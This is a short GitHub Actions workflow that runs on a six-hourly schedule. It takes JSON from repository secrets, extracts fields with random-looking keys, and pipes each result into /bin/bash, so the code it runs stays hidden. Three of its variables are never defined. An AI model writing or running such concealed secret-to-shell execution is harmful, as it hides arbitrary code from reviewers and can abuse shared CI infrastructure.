name: yanqing19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '16 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanqing19871010
        env:
          jh5: ${{ secrets.jh5 }}
        run: |
          echo $jh5 | jq -r .xqkll82051 | /bin/bash
          echo $c88 | jq -r .rdtl54937 | /bin/bash
          echo $qm8 | jq -r .ectd9 | /bin/bash
          echo $svtwg1 | jq -r .aduou75 | /bin/bash

